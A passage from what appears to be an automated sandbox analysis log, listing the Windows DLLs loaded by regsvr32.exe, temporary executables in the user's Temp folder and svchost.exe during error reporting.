                  Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: userenv.dll
                  Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: coloradapterclient.dll
                  Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: dnsapi.dll
                  Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: sspicli.dll
                  Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: msasn1.dll
                  Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: iertutil.dll
                  Source: C:\Users\user\AppData\Local\Temp\93D2.exeSection loaded: winmm.dll
                  Source: C:\Users\user\AppData\Local\Temp\93D2.exeSection loaded: kernel.appcore.dll
                  Source: C:\Users\user\AppData\Local\Temp\93D2.exeSection loaded: uxtheme.dll
                  Source: C:\Users\user\AppData\Local\Temp\A6A0.exeSection loaded: apphelp.dll
                  Source: C:\Users\user\AppData\Local\Temp\is-P4IIS.tmp\A6A0.tmpSection loaded: apphelp.dll
                  Source: C:\Users\user\AppData\Local\Temp\is-P4IIS.tmp\A6A0.tmpSection loaded: mpr.dll
                  Source: C:\Users\user\AppData\Local\Temp\is-P4IIS.tmp\A6A0.tmpSection loaded: version.dll
                  Source: C:\Users\user\AppData\Local\Temp\is-P4IIS.tmp\A6A0.tmpSection loaded: uxtheme.dll
                  Source: C:\Users\user\AppData\Local\Temp\is-P4IIS.tmp\A6A0.tmpSection loaded: kernel.appcore.dll
                  Source: C:\Users\user\AppData\Local\Temp\is-P4IIS.tmp\A6A0.tmpSection loaded: textinputframework.dll
                  Source: C:\Users\user\AppData\Local\Temp\is-P4IIS.tmp\A6A0.tmpSection loaded: coreuicomponents.dll
                  Source: C:\Users\user\AppData\Local\Temp\is-P4IIS.tmp\A6A0.tmpSection loaded: coremessaging.dll
                  Source: C:\Users\user\AppData\Local\Temp\is-P4IIS.tmp\A6A0.tmpSection loaded: ntmarta.dll
                  Source: C:\Users\user\AppData\Local\Temp\is-P4IIS.tmp\A6A0.tmpSection loaded: coremessaging.dll
                  Source: C:\Users\user\AppData\Local\Temp\is-P4IIS.tmp\A6A0.tmpSection loaded: wintypes.dll
                  Source: C:\Users\user\AppData\Local\Temp\is-P4IIS.tmp\A6A0.tmpSection loaded: wintypes.dll
                  Source: C:\Users\user\AppData\Local\Temp\is-P4IIS.tmp\A6A0.tmpSection loaded: wintypes.dll
                  Source: C:\Users\user\AppData\Local\Temp\is-P4IIS.tmp\A6A0.tmpSection loaded: windows.storage.dll
                  Source: C:\Users\user\AppData\Local\Temp\is-P4IIS.tmp\A6A0.tmpSection loaded: wldp.dll
                  Source: C:\Users\user\AppData\Local\Temp\is-P4IIS.tmp\A6A0.tmpSection loaded: propsys.dll
                  Source: C:\Users\user\AppData\Local\Temp\is-P4IIS.tmp\A6A0.tmpSection loaded: profapi.dll
                  Source: C:\Users\user\AppData\Local\Temp\is-P4IIS.tmp\A6A0.tmpSection loaded: edputil.dll
                  Source: C:\Users\user\AppData\Local\Temp\is-P4IIS.tmp\A6A0.tmpSection loaded: urlmon.dll
                  Source: C:\Users\user\AppData\Local\Temp\is-P4IIS.tmp\A6A0.tmpSection loaded: iertutil.dll
                  Source: C:\Users\user\AppData\Local\Temp\is-P4IIS.tmp\A6A0.tmpSection loaded: srvcli.dll
                  Source: C:\Users\user\AppData\Local\Temp\is-P4IIS.tmp\A6A0.tmpSection loaded: netutils.dll
                  Source: C:\Users\user\AppData\Local\Temp\is-P4IIS.tmp\A6A0.tmpSection loaded: windows.staterepositoryps.dll
                  Source: C:\Users\user\AppData\Local\Temp\is-P4IIS.tmp\A6A0.tmpSection loaded: appresolver.dll
                  Source: C:\Users\user\AppData\Local\Temp\is-P4IIS.tmp\A6A0.tmpSection loaded: bcp47langs.dll
                  Source: C:\Users\user\AppData\Local\Temp\is-P4IIS.tmp\A6A0.tmpSection loaded: slc.dll
                  Source: C:\Users\user\AppData\Local\Temp\is-P4IIS.tmp\A6A0.tmpSection loaded: userenv.dll
                  Source: C:\Users\user\AppData\Local\Temp\is-P4IIS.tmp\A6A0.tmpSection loaded: sppc.dll
                  Source: C:\Users\user\AppData\Local\Temp\is-P4IIS.tmp\A6A0.tmpSection loaded: onecorecommonproxystub.dll
                  Source: C:\Users\user\AppData\Local\Temp\is-P4IIS.tmp\A6A0.tmpSection loaded: onecoreuapcommonproxystub.dll
                  Source: C:\Users\user\AppData\Local\Temp\A6A0.exeSection loaded: apphelp.dll
                  Source: C:\Users\user\AppData\Local\Temp\is-C1KVS.tmp\A6A0.tmpSection loaded: apphelp.dll
                  Source: C:\Users\user\AppData\Local\Temp\is-C1KVS.tmp\A6A0.tmpSection loaded: mpr.dll
                  Source: C:\Users\user\AppData\Local\Temp\is-C1KVS.tmp\A6A0.tmpSection loaded: version.dll
                  Source: C:\Users\user\AppData\Local\Temp\is-C1KVS.tmp\A6A0.tmpSection loaded: uxtheme.dll
                  Source: C:\Users\user\AppData\Local\Temp\is-C1KVS.tmp\A6A0.tmpSection loaded: kernel.appcore.dll
                  Source: C:\Users\user\AppData\Local\Temp\is-C1KVS.tmp\A6A0.tmpSection loaded: textinputframework.dll
                  Source: C:\Users\user\AppData\Local\Temp\is-C1KVS.tmp\A6A0.tmpSection loaded: coreuicomponents.dll
                  Source: C:\Users\user\AppData\Local\Temp\is-C1KVS.tmp\A6A0.tmpSection loaded: coremessaging.dll
                  Source: C:\Users\user\AppData\Local\Temp\is-C1KVS.tmp\A6A0.tmpSection loaded: ntmarta.dll
                  Source: C:\Users\user\AppData\Local\Temp\is-C1KVS.tmp\A6A0.tmpSection loaded: coremessaging.dll
                  Source: C:\Users\user\AppData\Local\Temp\is-C1KVS.tmp\A6A0.tmpSection loaded: wintypes.dll
                  Source: C:\Users\user\AppData\Local\Temp\is-C1KVS.tmp\A6A0.tmpSection loaded: wintypes.dll
                  Source: C:\Users\user\AppData\Local\Temp\is-C1KVS.tmp\A6A0.tmpSection loaded: wintypes.dll
                  Source: C:\Users\user\AppData\Local\Temp\is-C1KVS.tmp\A6A0.tmpSection loaded: shfolder.dll
                  Source: C:\Users\user\AppData\Local\Temp\is-C1KVS.tmp\A6A0.tmpSection loaded: rstrtmgr.dll
                  Source: C:\Users\user\AppData\Local\Temp\is-C1KVS.tmp\A6A0.tmpSection loaded: ncrypt.dll
                  Source: C:\Users\user\AppData\Local\Temp\is-C1KVS.tmp\A6A0.tmpSection loaded: ntasn1.dll
                  Source: C:\Users\user\AppData\Local\Temp\is-C1KVS.tmp\A6A0.tmpSection loaded: msacm32.dll
                  Source: C:\Users\user\AppData\Local\Temp\is-C1KVS.tmp\A6A0.tmpSection loaded: winmmbase.dll
                  Source: C:\Users\user\AppData\Local\Temp\is-C1KVS.tmp\A6A0.tmpSection loaded: winmmbase.dll
                  Source: C:\Users\user\AppData\Local\Temp\is-C1KVS.tmp\A6A0.tmpSection loaded: textshaping.dll
                  Source: C:\Users\user\AppData\Local\Temp\is-C1KVS.tmp\A6A0.tmpSection loaded: windows.storage.dll
                  Source: C:\Users\user\AppData\Local\Temp\is-C1KVS.tmp\A6A0.tmpSection loaded: wldp.dll
                  Source: C:\Users\user\AppData\Local\Temp\is-C1KVS.tmp\A6A0.tmpSection loaded: sspicli.dll
                  Source: C:\Users\user\AppData\Local\Temp\is-C1KVS.tmp\A6A0.tmpSection loaded: explorerframe.dll
                  Source: C:\Users\user\AppData\Local\Temp\is-C1KVS.tmp\A6A0.tmpSection loaded: sfc.dll
                  Source: C:\Users\user\AppData\Local\Temp\is-C1KVS.tmp\A6A0.tmpSection loaded: sfc_os.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: wersvc.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: windowsperformancerecordercontrol.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: weretw.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: xmllite.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: wldp.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: wer.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: faultrep.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: dbghelp.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: dbgcore.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: wer.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: userenv.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: profapi.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: sspicli.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
